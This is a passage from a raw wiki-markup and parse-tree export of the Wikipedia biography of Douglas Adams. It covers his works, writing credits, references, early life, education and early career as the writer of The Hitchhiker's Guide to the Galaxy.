(radio series)|The Hitchhiker's Guide to the Galaxy]]''<small>(shared with [[Geoffrey Perkins]])</small>\n|[[Hugo Award for Best Dramatic Presentation|Best Dramatic Presentation]]\n|{{nom}}\n|\n|}\n\n==Works==\n{{Refbegin|20em}}\n* ''[[The Private Life of Genghis Khan]]'' (1975), based on a comedy sketch Adams co-wrote with [[Graham Chapman]] (short story)\n* ''[[The Hitchhiker's Guide to the Galaxy (radio series)|The Hitchhiker's Guide to the Galaxy]]'' (1978) (radio series)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)|The Hitchhiker's Guide to the Galaxy]]'' (1979) (novel)\n* ''[[Shada]]'' (1979–1980), a Doctor Who serial\n* ''[[The Restaurant at the End of the Universe]]'' (1980) (novel)\n* ''[[Life, the Universe and Everything]]'' (1982) (novel)\n* ''[[The Meaning of Liff]]'' (1983 (book), with [[John Lloyd (producer)|John Lloyd]])\n* ''[[So Long, and Thanks for All the Fish]]'' (1984) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (computer game)|The Hitchhiker's Guide to the Galaxy]]'' (1984, with [[Steve Meretzky]]) (computer game)\n* ''[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]]'' (1985, with [[Geoffrey Perkins]])\n* ''[[Young Zaphod Plays It Safe]] (short story)'' (1986)\n* ''[[A Christmas Fairly Story]]'' {{sic}} (1986, with [[Terry Jones]]), and\n* ''Supplement to The Meaning of Liff'' (1986, with [[John Lloyd (producer)|John Lloyd]] and [[Stephen Fry]]), both part of\n** ''[[The Utterly Utterly Merry Comic Relief Christmas Book]]'' (1986, edited with [[Peter Fincham]])\n* ''[[Bureaucracy (computer game)|Bureaucracy]]'' (1987) (computer game)\n* ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) (novel)\n* ''[[The Long Dark Tea-Time of the Soul]]'' (1988) (novel)\n* ''[[The Deeper Meaning of Liff]]'' (1990, with [[John Lloyd (producer)|John Lloyd]])\n* ''[[Last Chance to See]]'' (1990, with [[Mark Carwardine]]) (book)\n* ''[[Mostly Harmless]]'' (1992) (novel)\n* ''[[The Hitchhiker's Guide to the Galaxy (book)#Illustrated edition|The Illustrated Hitchhiker's Guide to the Galaxy]]'' (1994)\n* ''[[Douglas Adams's Starship Titanic]]'' (1997), written by [[Terry Jones]], based on an idea by Adams\n* ''[[Starship Titanic]]'' (computer game) (1998)\n* ''[[h2g2]]'' (internet project) (1999)\n* ''The Internet: The Last Battleground of the 20th century'' (radio series) (2000)\n* ''[[The Hitchhiker's Guide to the Future]]'' (radio series) (2001) final project for [[BBC Radio 4]] before his death\n* ''[https://www.youtube.com/watch?v=_ZG8HBuDjgc Parrots, the universe and everything]'' (2001)\n* ''[[The Salmon of Doubt]]'' (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by [[Simon Jones (actor)|Simon Jones]])\n* ''[[The Hitchhiker's Guide to the Galaxy (film)|The Hitchhiker's Guide to the Galaxy]]'' (2005) (film)\n{{Refend}}\n\n==Writing credits==\n{| class=\"wikitable\"\n|- style=\"background:#ccc; text-align:center;\"\n! Production\n! Notes\n! Broadcaster\n|-\n|''[[Monty Python's Flying Circus]]''\n|\n*\"[[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|Party Political Broadcast on Behalf of the Liberal Party]]\" (1974)\n|[[BBC Two]]\n|-\n|''[[Out of the Trees]]''\n|\n*Television pilot (1976)\n|BBC Two\n|-\n|''[[Doctor on the Go]]''\n|\n*\"For Your Own Good\" (1977)\n|[[ITV (TV network)|ITV]]\n|-\n|''[[Doctor Who]]''\n|\n5 episodes (1978-1979, 1983): \n*\"[[The Pirate Planet]]\" (1978)\n*\"[[Destiny of the Daleks]]\" (1979) (uncredited)\n*\"[[City of Death]]\" (co-written with [[Graham Williams (television producer)|Graham Williams]], 1979)\n*\"[[The Five Doctors]]\" (1983) ([[Shada]] segments; uncredited)\n|[[BBC One]]\n|-\n|''[[Doctor Snuggles]]''\n|\n*\"The Great Disappearing Mystery\" (1979)\n*\"The Remarkable Fidgety River\" (1979)\n|ITV\n|-\n|''[[Not the Nine O'Clock News]]''\n|\n*Unknown episodes (1979)\n|BBC Two\n|-\n|''[[The Hitchhiker's Guide to the Galaxy (TV series)|The Hitchhiker's Guide to the Galaxy]]''\n|\n*6 episodes (1981)\n|BBC Two\n|-\n|''[[Hyperland]]''\n|\n*Television documentary (1990)\n|BBC Two\n|}\n\n==Notes==\n{{reflist|30em}}\n\n==References==\n* Adams, Douglas (1998). [http://www.biota.org/people/douglasadams/ Is there an Artificial God?], speech at ''Digital Biota 2'', Cambridge, England, September 1998.\n* {{cite book|last=Adams|first=Douglas|title=The Salmon of Doubt: Hitchhiking the Galaxy One Last Time|year=2002|publisher=Macmillan|location=London|isbn=0-333-76657-1|ref=harv}}\n* Dawkins, Richard (2003). \"Eulogy for Douglas Adams,\" in ''A devil's chaplain: reflections on hope, lies, science, and love''. Houghton Mifflin Harcourt.\n* Felch, Laura (2004). [http://www.bookslut.com/nonfiction/2004_05_002057.php Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman], May 2004\n* Ray, Mohit K (2007). ''Atlantic Companion to Literature in English'', Atlantic Publishers and Distributors. ISBN 81-269-0832-7\n* {{cite book|last=Simpson|first=M. J.|title=[[Hitchhiker: A Biography of Douglas Adams]]|year=2003|publisher=Justin, Charles & Co|location=Boston, Mass.|isbn=1-932112-17-0|edition=1st|ref=harv}}\n* Webb, Nick (2005a). ''Wish You Were Here: The Official Biography of Douglas Adams''. Ballantine Books. ISBN 0-345-47650-6\n* Webb, Nick (2005b). [http://www.oxforddnb.com/view/article/75853 \"Adams, Douglas Noël (1952–2001)\"], ''Oxford Dictionary of National Biography'', Oxford University Press, January 2005. Retrieved 25 October 2005.\n\n==Further reading==\n===Articles===\n{{Refbegin|30em}}\n* Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.\n* Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.\n* Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.\n* Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.\n* Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.\n* Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.\n* Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.\n* The Long Dark Tea-Time of the Soul (Book). (1989). Atlantic (02769077), 263(4), 99.\n* Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.\n* Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.\n* Last Chance to See (Book). (1991). Science News, 139(8), 126.\n* Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.\n* Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.\n* Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.\n* Beatty, J. (1991). Good Show (Book). Atlantic (02769077), 267(3), 131.\n* A guide to the future. (1992). Maclean's, 106(44), 51.\n* Zinsser, J. (1993). Audio reviews: Fiction. Publishers Weekly, 240(9), 24.\n* Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.\n* Good reads. (1995). NetGuide, 2(4), 109.\n* Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.\n* Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.\n* So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.\n* Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.\n* Passages. (2001). Maclean's, 114(21), 13.\n* Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.\n* Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.\n* Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.\n* Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.\n* Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.\n* Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.\n* Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.\n* Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.\n* Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). Library Journal, 128(11), 124.\n* Preying on composite materials. (2003). R&D Magazine, 45(6), 44.\n* Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.\n* The author who toured the universe. (2003). Bookseller, (5060), 35.\n* Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.\n* Culture vulture. (2005). Times Educational Supplement, (4640), 19.\n* Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.\n* Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.\n* Rea, A. (2005). The Adams asteroids. New Scientist, 185(2488), 31.\n* Most Improbable Adventure. (2005). Popular Mechanics, 182(5), 32.\n* The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.\n* Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.\n* Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.\n* Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.\n* Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.\n* Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.\n* Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.\n* Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp. 50–53.\n* Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.\n* Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.\n* Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 08.\n* Arrow to reissue Adams. (2008). Bookseller, (5352), 14.\n* Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.\n* I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.\n* Mostly Harmless.... (2009). Bookseller, (5374), 46.\n* Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.\n* Adams, Douglas. Britannica Biographies [serial online]. October 2010;:1\n* Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011;:1\n* My life in books. (2011). Times Educational Supplement, (4940), 27.\n{{Refend}}\n\n===Other===\n* {{Wayback |df=yes|date=20110720193159 |url=http://www.douglasadams.com/ |title=Adams's official web site }}, established by him, and still operated by [[The Digital Village]]\n* {{TED speaker|douglas_adams}}\n* [http://www.biota.org/people/douglasadams/ Douglas Adams speech at Digital Biota 2 (1998)] [http://www.biota.org/podcast/#DNA (The audio of the speech)]\n* [http://www.guardian.co.uk/books/2008/jun/09/douglasadams Guardian Books \"Author Page\"], with profile and links to further articles.\n* {{Worldcat id|id=lccn-n80-76765}}\n* [http://www.vintagemacworld.com/iifx.html Douglas Adams & his Computer] article about his Mac IIfx\n* BBC2 \"Omnibus\" tribute to Adams, presented by Kirsty Wark, 4 August 2001\n* Mueller, Rick and Greengrass, Joel (2002). ''Life, The Universe and Douglas Adams'', documentary.\n* Simpson, M.J. (2001). ''The Pocket Essential Hitchhiker's Guide''. ISBN 1-903047-40-4. Updated April 2005 ISBN 1-904048-46-3\n* [http://www.bbc.co.uk/programmes/p00fpvbm Special edition of BBC Book Club featuring Douglas Adams], first broadcast 2 January 2000 on BBC Radio 4\n\n==External links==\n{{Library resources box\n |by=yes\n |viaf=113230702\n |label=Douglas Adams}}\n{{Spoken Wikipedia-2|2006-02-11|Douglas_Adams_Part_1.ogg|Douglas_Adams_Part_2.ogg}}\n* {{Commons category-inline}}\n* {{Wikiquote-inline}}\n* {{Find a Grave|22814}}\n* {{IMDb name|0010930}}\n* [http://towelday.org/ Towel Day, 25 May]\n\n{{s-start}}\n{{s-bef|before= [[Anthony Read]]}} \n{{s-ttl|title=''[[Doctor Who]]'' script editor|years=1979–80}} \n{{s-aft|after= [[Christopher H. Bidmead]]}}\n{{s-end}}\n{{Douglas Adams}}\n{{HitchhikerBooks}}\n{{Dirk Gently}}\n{{Doctor Who}}\n{{Infocom games}}\n{{animal rights|state=collapsed}}\n\n{{Authority control}}\n\n{{DEFAULTSORT:Adams, Douglas}}\n[[Category:Douglas Adams| ]]\n[[Category:1952 births]]\n[[Category:2001 deaths]]\n[[Category:Alumni of St John's College, Cambridge]]\n[[Category:Animal rights advocates]]\n[[Category:Atheism activists]]\n[[Category:Audio book narrators]]\n[[Category:British social commentators]]\n[[Category:BBC radio producers]]\n[[Category:British child writers]]\n[[Category:Burials at Highgate Cemetery]]\n[[Category:English atheists]]\n[[Category:English comedy writers]]\n[[Category:English humanists]]\n[[Category:English humorists]]\n[[Category:English radio writers]]\n[[Category:English science fiction writers]]\n[[Category:English television writers]]\n[[Category:Infocom]]\n[[Category:Interactive fiction writers]]\n[[Category:Monty Python]]\n[[Category:Non-fiction environmental writers]]\n[[Category:People educated at Brentwood School (Essex)]]\n[[Category:People from Cambridge]]\n[[Category:Usenet people]]\n[[Category:Critics of religions]]\n[[Category:20th-century English novelists]]\n[[Category:21st-century British novelists]]",
"properties": {
"defaultsort": "Adams, Douglas",
"wikibase_item": "Q42"
},
"parsetree": "<root><template><title>other people</title></template>\n<template lineStart=\"1\"><title>Use British English</title><part><name>date</name><equals>=</equals><value>October 2013</value></part></template>\n<template lineStart=\"1\"><title>Use dmy dates</title><part><name>date</name><equals>=</equals><value>April 2015</value></part></template>\n<template lineStart=\"1\"><title>Infobox writer <comment><!-- for more information see [[:Template:Infobox writer/doc]] --></comment>\n</title><part><name> name </name><equals>=</equals><value> Douglas Adams\n</value></part><part><name> image </name><equals>=</equals><value> Douglas adams portrait cropped.jpg\n</value></part><part><name> caption </name><equals>=</equals><value>\n</value></part><part><name> birth_name </name><equals>=</equals><value> Douglas Noel Adams\n</value></part><part><name> birth_date </name><equals>=</equals><value> <template><title>birth date</title><part><name index=\"1\"/><value>1952</value></part><part><name index=\"2\"/><value>3</value></part><part><name index=\"3\"/><value>11</value></part><part><name>df</name><equals>=</equals><value>yes</value></part></template>\n</value></part><part><name> birth_place </name><equals>=</equals><value> [[Cambridge]], England\n</value></part><part><name> height </name><equals>=</equals><value> <template><title>height</title><part><name>ft</name><equals>=</equals><value>6</value></part><part><name>in</name><equals>=</equals><value>5</value></part></template>\n</value></part><part><name> death_date </name><equals>=</equals><value> <template><title>Death date and age</title><part><name index=\"1\"/><value>2001</value></part><part><name index=\"2\"/><value>5</value></part><part><name index=\"3\"/><value>11</value></part><part><name index=\"4\"/><value>1952</value></part><part><name index=\"5\"/><value>3</value></part><part><name index=\"6\"/><value>11</value></part><part><name>df</name><equals>=</equals><value>yes</value></part></template>\n</value></part><part><name> death_place </name><equals>=</equals><value> [[Montecito, California]], U.S.\n</value></part><part><name> resting_place </name><equals>=</equals><value> [[Highgate Cemetery]], London, England\n</value></part><part><name> alma_mater </name><equals>=</equals><value> [[St John's College, Cambridge]]\n</value></part><part><name> occupation </name><equals>=</equals><value> Writer\n</value></part><part><name> genre </name><equals>=</equals><value> Science fiction, comedy, satire\n</value></part><part><name> movement </name><equals>=</equals><value>\n</value></part><part><name> website </name><equals>=</equals><value> <template><title>URL</title><part><name index=\"1\"/><value>douglasadams.com/</value></part></template>\n</value></part></template>\n<comment><!-- Do *not* change spelling of "Hitchhiker's"; see talk page for details -->\n</comment><comment><!-- Please do *not* change spelling of "Noel". There is no 'ë'. Any citations have themselves been taken from an earlier, incorrect edit of Wikipedia; see talk page for details -->\n</comment>'''Douglas Noel Adams''' (11 March 1952 – 11 May 2001) was an [[English people|English]] [[author]], [[scriptwriter]], [[essayist]], [[List of humorists|humourist]], [[satirist]] and [[dramatist]].\n\nAdams is best known as the author of ''[[The Hitchhiker's Guide to the Galaxy]]'', which originated in 1978 as a BBC [[The Hitchhiker's Guide to the Galaxy (radio series)|radio comedy]] before developing into a "trilogy" of five books that sold more than 15&nbsp;million copies in his lifetime and generated a [[The Hitchhiker's Guide to the Galaxy (TV series)|television series]], several stage plays, comics, a [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and in 2005 a [[The Hitchhiker's Guide to the Galaxy (film)|feature film]]. Adams's contribution to UK radio is commemorated in [[Radio Academy|The Radio Academy]]'s Hall of Fame.<ext><name>ref</name><attr> name="radioacad"</attr><inner>{{cite web|title=The Radio Academy Hall of Fame |url=http://www.radioacademy.org/hall-of-fame |work=The Radio Academy |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F |archivedate=8 December 2011 |deadurl=no |df=dmy }}</inner><close></ref></close></ext>\n\nAdams also wrote ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) and ''[[The Long Dark Tea-Time of the Soul]]'' (1988), and co-wrote ''[[The Meaning of Liff]]'' (1983), ''[[The Deeper Meaning of Liff]]'' (1990), ''[[Last Chance to See]]'' (1990), and three stories for the television series ''[[Doctor Who]]''; he also served as [[script editor]] for the show's seventeenth season in 1979. A posthumous collection of his works, including an unfinished novel, was published as ''[[The Salmon of Doubt]]'' in 2002.\n\nAdams was known as an advocate for environmentalism and [[conservation movement|conservation]], as a lover of fast cars, cameras, [[technological innovation]] and the [[Apple Macintosh]], and as a "devout [[atheist]]".\n\n<h level=\"2\" i=\"1\">==Early life==</h>\n<comment><!-- Please leave this section heading as is, for the chronology of events. Adams's own family (wife and daughter) are discussed later. -->\n</comment>Adams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in [[Cambridge]], England.<ext><name>ref</name><attr> name=ODNB </attr><inner>Webb 2005b</inner><close></ref></close></ext> The following year, [[James D. Watson|Watson]] and [[Francis Crick|Crick]] famously first modelled [[DNA]] at [[Cambridge University]], leading Adams to later quip he was DNA in Cambridge months earlier. The family moved to [[East End of London|East London]] a few months after his birth, where his sister, Susan, was born three years later.<ext><name>ref</name><attr> name=Adams_xix</attr><inner>{{Harvnb|Adams|2002|pp=xix}}</inner><close></ref></close></ext> His parents divorced in 1957; Douglas, Susan, and their mother moved to an [[RSPCA]] animal shelter in [[Brentwood, Essex]], run by his maternal grandparents.<ext><name>ref</name><attr/><inner>Webb 2005a, p. 32.</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"2\">===Education===</h>\nAdams attended Primrose Hill Primary School in [[Brentwood, Essex|Brentwood]]. At nine, he passed the entrance exam for [[Brentwood School (Essex)|Brentwood School]], an independent school whose alumni include [[Robin Day]], [[Jack Straw]], [[Noel Edmonds]], and [[David Irving]]. [[Griff Rhys Jones]] was a year below him, and he was in the same class as [[Stuckism|Stuckist]] artist [[Charles Thomson (artist)|Charles Thomson]]. He attended the [[Preparatory school (UK)|prep school]] from 1959 to 1964, then the main school until December 1970. His form master, Frank Halford, said of him: "Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. He was unnecessarily tall and in his short trousers he looked a trifle self-conscious." "The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial'," he joked, "but 'Meet under Adams'."<ext><name>ref</name><attr> name=Adams_7</attr><inner>{{Harvnb|Adams|2002|pp=7}}</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>Botti, Nicholas. [http://douglasadams.eu/interview-with-frank-halford/ "Interview with Frank Halford"]. ''Life, DNA, and H2G2.'' 2009. Web. Retrieved 13 March 2012. (Click on link at bottom for facsimile page from ''Daily News'' article, 7 March 1998.)</inner><close></ref></close></ext> Yet it was his ability to write first-class stories that really made him "shine".<ext><name>ref</name><attr> name=Simpson_9</attr><inner>{{Harvnb|Simpson|2003|pp=9}}</inner><close></ref></close></ext>\n\nAdams was six feet tall (1.83&nbsp;m) by age 12 and stopped growing at 6&nbsp;ft 5&nbsp;in (1.96&nbsp;m). He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing [[writer's block]].<ext><name>ref</name><attr> name=Adams_xix </attr></ext>\n\nSome of his earliest writing was published at the school, such as a report on its photography club in ''The Brentwoodian'' in 1962, or spoof reviews in the school magazine ''Broadsheet'', edited by [[Paul Neil Milne Johnstone]], who later became a character in ''The Hitchhiker's Guide''. He also designed the cover of one issue of the ''Broadsheet'', and had a letter and short story published nationally in ''[[Eagle (comic)|The Eagle]]'', the boys' comic, in 1965. A poem entitled "A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. In it, Adams rhymes "futile" with "mute, while" and "exhausted" with "of course did".<ext><name>ref</name><attr/><inner>Flood, Alison (March 2014). [http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones "Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard"], ''The Guardian'', 19 March 2014. Accessed 2 July 2014</inner><close></ref></close></ext> On the strength of a bravura essay on religious poetry that discussed [[the Beatles]] and [[William Blake]], he was awarded an [[Exhibition (scholarship)|Exhibition]] in English at [[St John's College, Cambridge]], going up in 1971. He wanted to join the [[Footlights]], an invitation-only student comedy club that has acted as a hothouse for comic talent. He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called "Adams-Smith-Adams", but became a member of the Footlights by 1973.<ext><name>ref</name><attr> name=Simpson_30-40</attr><inner>{{Harvnb|Simpson|2003|pp=30–40}}</inner><close></ref></close></ext> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in [[English literature]].<ext><name>ref</name><attr> name=ODNB</attr></ext>\n\n<h level=\"2\" i=\"3\">==Career==</h>\n\n<h level=\"3\" i=\"4\">===Writing===</h>\nAfter leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the ''Footlights Revue'' appeared on [[BBC Two|BBC2]] television in 1974. A version of the Revue performed live in London's [[West End of London|West End]] led to Adams being discovered by [[Monty Python]]'s [[Graham Chapman]]. The two formed a brief writing partnership, earning Adams a writing credit in [[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|episode 45]] of ''Monty Python'' for a sketch called "[[Patient Abuse]]". He is one of only two people outside the original Python members to get a writing credit (the other being [[Neil Innes]]).<ext><name>ref</name><attr> name=times</attr><inner>{{cite news|title=Terry Jones remembers Douglas Adams, 'the last of the Pythons'|newspaper=The Times|date=10 October 2009}}</inner><close></ref></close></ext> The sketch plays on the idea of mind-boggling paper work in an emergency, a joke later incorporated into the [[Vogon]]s' obsession with paperwork. Adams also contributed to a sketch on the album for ''[[Monty Python and the Holy Grail]]''.\n\n[[File:DNA in Monty Python.jpg|thumb|Adams in his first ''[[Monty Python's Flying Circus|Monty Python]]'' appearance, in full surgeon's garb]]\n\nAdams had two brief appearances in the fourth series of ''[[Monty Python's Flying Circus]]''. At the beginning of episode 42, "The Light Entertainment War", Adams is in a surgeon's mask (as Dr. Emile Koning, according to on-screen captions), pulling on gloves, while [[Michael Palin]] narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, "Mr. Neutron", Adams is dressed in a [[List of recurring Monty Python's Flying Circus characters#The Pepperpots|pepper-pot]] outfit and loads a missile onto a cart driven by [[Terry Jones]], who is calling for scrap metal ("Any old iron..."). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including ''[[Out of the Trees]]''.\n\nAt this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<ext><name>ref</name><attr> name=ODNB </attr></ext> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, "At least you can read while you're on the job."<ext><name>ref</name><attr/><inner>Webb 2005a, p. 93.</inner><close></ref></close></ext>\n\nDuring this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed ''Unpleasantness at Brodie's Close'' at the [[Edinburgh Fringe]] festival. By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<ext><name>ref</name><attr> name=ODNB </attr></ext> The lack of writing work hit him hard and low confidence became a feature of Adams's life; "I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. You can't fix the weather&nbsp;– you just have to get on with it".<ext><name>ref</name><attr> name=Adams_prologue</attr><inner>{{Harvnb|Adams|2002|pp=prologue}}</inner><close></ref></close></ext>\n\nSome of Adams's early radio work included sketches for ''[[The Burkiss Way]]'' in 1977 and ''[[The News Huddlines]]''.<ext><name>ref</name><attr/><inner>''Hitchhiker: A Biography of Douglas Adams'' by M. J. Simpson, p87</inner><close></ref></close></ext> He also wrote, again with Chapman, 20 February 1977 episode of ''Doctor on the Go'', a sequel to the ''[[Doctor in the House (TV series)|Doctor in the House]]'' television comedy series. After the [[The Hitchhiker's Guide to the Galaxy (radio series)|first radio series of ''The Hitchhiker's Guide'']] became successful, Adams was made a BBC radio producer, working on ''[[Week Ending]]'' and a pantomime called ''[[Black Cinderella Two Goes East]]''.<ext><name>ref</name><attr/><inner>Roberts, Jem. ''The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent'': London, 2009, p164-5</inner><close></ref></close></ext> He left after six months to become the script editor for ''[[Doctor Who]]''.\n\nIn 1979 Adams and [[John Lloyd (producer)|John Lloyd]] wrote scripts for two half-hour episodes of ''[[Doctor Snuggles]]'': "The Remarkable Fidgety River" and "The Great Disappearing Mystery" (episodes seven and twelve). John Lloyd was also co-author of two episodes from the original ''Hitchhiker'' radio series ("Fit the Fifth" and "Fit the Sixth", also known as "Episode Five" and "Episode Six"), as well as ''[[The Meaning of Liff]]'' and ''[[The Deeper Meaning of Liff]]''.\n\n<h level=\"4\" i=\"5\">====''The Hitchhiker's Guide to the Galaxy''====</h>\n<template lineStart=\"1\"><title>Main article</title><part><name index=\"1\"/><value>The Hitchhiker's Guide to the Galaxy</value></part></template>\n''The Hitchhiker's Guide to the Galaxy'' was a concept for a science-fiction comedy radio series pitched by Adams and radio producer [[Simon Brett]] to [[BBC Radio 4]] in 1977. Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in [[Neil Gaiman]]'s book ''[[Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion]]'') that could potentially be used in the series.\n[[File:Towelday-Innsbruck.jpg|thumb|upright|[[Towel Day]] 2005 in Innsbruck, Austria, where Adams first had the idea of ''The Hitchhiker's Guide''. In the novels a towel is the most useful thing a space traveller can have. The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.]]\n\nAccording to Adams, the idea for the title occurred to him while he lay drunk in a field in [[Innsbruck]], Austria, gazing at the stars. He was carrying a copy of the ''[[Hitch-hiker's Guide to Europe]]'', and it occurred to him that "somebody ought to write a ''Hitchhiker's Guide to the Galaxy''". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas| editor= Geoffrey Perkins (ed.), Additional Material by M. J. Simpson|title=[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]] | page = 10 | edition =25th Anniversary | publisher=Pan Books | year=2003 | isbn=0-330-41957-9}}</inner><close></ref></close></ext>\n\nDespite the original outline, Adams was said to make up the stories as he wrote. He turned to [[John Lloyd (producer)|John Lloyd]] for help with the final two episodes of [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Primary Phase|the first series]]. Lloyd contributed bits from an unpublished science fiction book of his own, called ''GiGax''.<ext><name>ref</name><attr/><inner>Webb 2005a, p. 120.</inner><close></ref></close></ext> Very little of Lloyd's material survived in later adaptations of ''Hitchhiker's'', such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.\n\n[[BBC Radio 4]] broadcast the first radio series weekly in the UK in March and April 1978. The series was distributed in the United States by [[National Public Radio]]. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Secondary Phase|A second series]] of five episodes was broadcast one per night, during the week of 21–25 January 1980.\n\nWhile working on the radio series (and with simultaneous projects such as ''[[The Pirate Planet]]'') Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that ''[[So Long, and Thanks for All the Fish]]'' was completed.<ext><name>ref</name><attr/><inner>Felch 2004</inner><close></ref></close></ext> He was quoted as saying, "I love deadlines. I love the whooshing noise they make as they go by."<ext><name>ref</name><attr> name=Simpson_236</attr><inner>{{Harvnb|Simpson|2003|pp=236}}</inner><close></ref></close></ext> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.\n\nThe books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and a photo-illustrated edition, published in 1994. This latter edition featured a [[42 Puzzle]] designed by Adams, which was later 